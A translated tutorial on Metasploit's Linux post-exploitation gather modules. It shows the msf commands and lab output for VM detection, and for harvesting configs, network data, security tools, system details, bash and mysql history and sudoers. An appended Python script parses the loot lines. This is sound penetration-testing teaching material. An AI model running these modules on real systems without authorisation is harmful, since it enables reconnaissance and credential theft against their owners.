Linux Post-Exploitation Information Gathering (metasploit)


Preface: I suddenly found that information gathering on Linux is a hassle, so I am sharing with you the one-click Linux information-gathering modules in Metasploit; they are very practical.

Checking for a virtual machine

The checkvm module tries to determine whether the system is running inside a virtual environment and, if so, which one. The module supports detection of Hyper-V, VMware, VirtualBox, Xen and QEMU/KVM.

msf > use post/linux/gather/checkvm
msf post(checkvm) > show options

Module options (post/linux/gather/checkvm):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(checkvm) > run

[*] Gathering System info ....
[+] This appears to be a 'VMware' virtual machine
[*] Post module execution completed

Enumerating configuration files

The enum_configs module collects configuration files from commonly installed applications and services such as Apache, MySQL, Samba, Sendmail and others. If a configuration file is found in its default path, the module assumes it is the file we are looking for.

msf  > use post/linux/gather/enum_configs 
msf post(enum_configs) > show options

Module options (post/linux/gather/enum_configs):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(enum_configs) > run

[*] Running module against kali
[*] Info:
[*] Kali GNU/Linux 1.0.6
[*] Linux kali 3.12-kali1-486 #1 Debian 3.12.6-2kali1 (2014-01-06) i686 GNU/Linux
[*] apache2.conf stored in /root/.msf4/loot/20140228005504_default_192.168.1.109_linux.enum.conf_735045.txt
[*] ports.conf stored in /root/.msf4/loot/20140228005504_default_192.168.1.109_linux.enum.conf_787442.txt
[*] nginx.conf stored in /root/.msf4/loot/20140228005504_default_192.168.1.109_linux.enum.conf_248658.txt
[*] my.cnf stored in /root/.msf4/loot/20140228005505_default_192.168.1.109_linux.enum.conf_577389.txt
[*] shells stored in /root/.msf4/loot/20140228005507_default_192.168.1.109_linux.enum.conf_583272.txt
[*] sepermit.conf stored in /root/.msf4/loot/20140228005507_default_192.168.1.109_linux.enum.conf_027227.txt
[*] ca-certificates.conf stored in /root/.msf4/loot/20140228005508_default_192.168.1.109_linux.enum.conf_626893.txt
[*] access.conf stored in /root/.msf4/loot/20140228005508_default_192.168.1.109_linux.enum.conf_619382.txt
[*] rpc stored in /root/.msf4/loot/20140228005509_default_192.168.1.109_linux.enum.conf_666867.txt
[*] debian.cnf stored in /root/.msf4/loot/20140228005509_default_192.168.1.109_linux.enum.conf_173984.txt
[*] chkrootkit.conf stored in /root/.msf4/loot/20140228005510_default_192.168.1.109_linux.enum.conf_025881.txt
[*] logrotate.conf stored in /root/.msf4/loot/20140228005510_default_192.168.1.109_linux.enum.conf_438551.txt
[*] smb.conf stored in /root/.msf4/loot/20140228005511_default_192.168.1.109_linux.enum.conf_545804.txt
[*] ldap.conf stored in /root/.msf4/loot/20140228005511_default_192.168.1.109_linux.enum.conf_464721.txt
[*] sysctl.conf stored in /root/.msf4/loot/20140228005513_default_192.168.1.109_linux.enum.conf_077261.txt
[*] proxychains.conf stored in /root/.msf4/loot/20140228005513_default_192.168.1.109_linux.enum.conf_855958.txt
[*] snmp.conf stored in /root/.msf4/loot/20140228005514_default_192.168.1.109_linux.enum.conf_291777.txt
[*] Post module execution completed

Enumerating network information

The enum_network module enumerates network information from the target system: firewall rules, interfaces, wireless information, open and listening ports, active network connections, DNS information and SSH information.

msf > use post/linux/gather/enum_network 
msf post(enum_network) > show options

Module options (post/linux/gather/enum_network):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(enum_network) > run

[*] Running module against kali
[*] Module running as root
[+] Info:
[+] Kali GNU/Linux 1.0.6
[+] Linux kali 3.12-kali1-486 #1 Debian 3.12.6-2kali1 (2014-01-06) i686 GNU/Linux
[*] Collecting data...
[*] Network config stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_533784.txt
[*] Route table stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_173980.txt
[*] Firewall config stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_332941.txt
[*] DNS config stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_007812.txt
[*] SSHD config stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_912697.txt
[*] Host file stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_477226.txt
[*] Active connections stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_052505.txt
[*] Wireless information stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_069586.txt
[*] Listening ports stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_574507.txt
[*] If-Up/If-Down stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_848840.txt
[*] Post module execution completed

Enumerating protections

The enum_protections module tries to find installed applications that could prevent, or detect, our attacks. It does this by looking for specific binary locations and checking whether they are in fact executable files. For example, if we are able to run 'snort' as a command, we assume it is one of the files we are looking for. The module is designed to cover a variety of antivirus, rootkit, IDS/IPS, firewall and other software.

msf > use post/linux/gather/enum_protections
msf post(enum_protections) > show options

Module options (post/linux/gather/enum_protections):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(enum_protections) > run

[*] Running module against kali
[*] Info:
[*] Kali GNU/Linux 1.0.6
[*] Linux kali 3.12-kali1-486 #1 Debian 3.12.6-2kali1 (2014-01-06) i686 GNU/Linux
[*] Finding installed applications...
[+] truecrypt found: /usr/bin/truecrypt
[+] logrotate found: /usr/sbin/logrotate
[+] chkrootkit found: /usr/sbin/chkrootkit
[+] lynis found: /usr/sbin/lynis
[+] tcpdump found: /usr/sbin/tcpdump
[+] proxychains found: /usr/bin/proxychains
[+] wireshark found: /usr/bin/wireshark
[*] Installed applications saved to notes.
[*] Post module execution completed

Enumerating system information

The enum_system module collects system information: installed packages, installed services, mount information, the user list, user bash history and cron jobs.

msf > use post/linux/gather/enum_system 
msf post(enum_system) > show options

Module options (post/linux/gather/enum_system):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(enum_system) > run

[+] Info:
[+] Kali GNU/Linux 1.0.6
[+] Linux kali 3.12-kali1-486 #1 Debian 3.12.6-2kali1 (2014-01-06) i686 GNU/Linux
[*] Linux version stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_186949.txt
[*] User accounts stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_538758.txt
[*] Installed Packages stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_116127.txt
[*] Running Services stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_805781.txt
[*] Cron jobs stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_460600.txt
[*] Disk info stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_538625.txt
[*] Logfiles stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_922920.txt
[*] Setuid/setgid files stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_076798.txt
[*] Post module execution completed

User-specific information (history)

The enum_users_history module collects user-specific information: the user list, bash history, mysql history, vim history, lastlog and sudoers.

msf > use post/linux/gather/enum_users_history
msf post(enum_users_history) > show options

Module options (post/linux/gather/enum_users_history):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(enum_users_history) > run

[+] Info:
[+] Kali GNU/Linux 1.0.6
[+] Linux kali 3.12-kali1-486 #1 Debian 3.12.6-2kali1 (2014-01-06) i686 GNU/Linux
[*] History for root stored in /root/.msf4/loot/20140228005914_default_192.168.1.109_linux.enum.users_491309.txt
[*] History for root stored in /root/.msf4/loot/20140228005930_default_192.168.1.109_linux.enum.users_349754.txt
[*] Last logs stored in /root/.msf4/loot/20140228010003_default_192.168.1.109_linux.enum.users_170027.txt
[*] Sudoers stored in /root/.msf4/loot/20140228010003_default_192.168.1.109_linux.enum.users_210141.txt
[*] Post module execution completed
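Every gather module above reports its results as "<label> stored in /root/.msf4/loot/<timestamp>_<workspace>_<host>_<loot type>_<random>.txt" lines. The following is an added example, not code from the original post or from Metasploit, that parses those lines into an inventory of what was collected per host and loot type; it is useful when reviewing a red-team engagement or triaging a loot directory left behind on a compromised operator host. The sample lines are constructed from the output shown above.

```python
import re
from collections import defaultdict
from datetime import datetime

# "<label> stored in <path>" lines printed by the post/linux/gather modules
# (the prefix may be [*] or [+]).
STORED_RE = re.compile(r"^\[[*+]\] (?P<label>.+?) stored in (?P<path>\S+)$")

# Loot filename convention seen above:
# <YYYYmmddHHMMSS>_<workspace>_<host>_<ltype>_<random>.<ext>
LOOT_NAME_RE = re.compile(
    r"^(?P<ts>\d{14})_(?P<workspace>[^_]+)_(?P<host>[^_]+)_"
    r"(?P<ltype>[a-z.]+)_(?P<rand>\d+)\.(?P<ext>\w+)$"
)


def parse_loot_line(line):
    """Return a dict describing one 'stored in' line, or None if it is not one."""
    m = STORED_RE.match(line.strip())
    if not m:
        return None
    path = m.group("path")
    n = LOOT_NAME_RE.match(path.rsplit("/", 1)[-1])
    if not n:
        return None  # a path that does not follow the loot naming convention
    return {
        "label": m.group("label"),
        "path": path,
        "when": datetime.strptime(n.group("ts"), "%Y%m%d%H%M%S"),
        "workspace": n.group("workspace"),
        "host": n.group("host"),
        "ltype": n.group("ltype"),
    }


def inventory(lines):
    """Group parsed loot entries as (host, ltype) -> list of labels, in order seen."""
    groups = defaultdict(list)
    for line in lines:
        entry = parse_loot_line(line)
        if entry:
            groups[(entry["host"], entry["ltype"])].append(entry["label"])
    return dict(groups)


# Constructed sample: lines copied from the module output above plus two noise lines.
SAMPLE = """\
[*] Running module against kali
[*] my.cnf stored in /root/.msf4/loot/20140228005505_default_192.168.1.109_linux.enum.conf_577389.txt
[*] smb.conf stored in /root/.msf4/loot/20140228005511_default_192.168.1.109_linux.enum.conf_545804.txt
[*] SSHD config stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_912697.txt
[*] Sudoers stored in /root/.msf4/loot/20140228010003_default_192.168.1.109_linux.enum.users_210141.txt
[*] Post module execution completed
""".splitlines()

if __name__ == "__main__":
    for (host, ltype), labels in sorted(inventory(SAMPLE).items()):
        print(f"{host} {ltype}: {', '.join(labels)}")
```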


This article was first published on the WeChat public account 5号黯区: Linux后渗透之信息收集(metasploit)
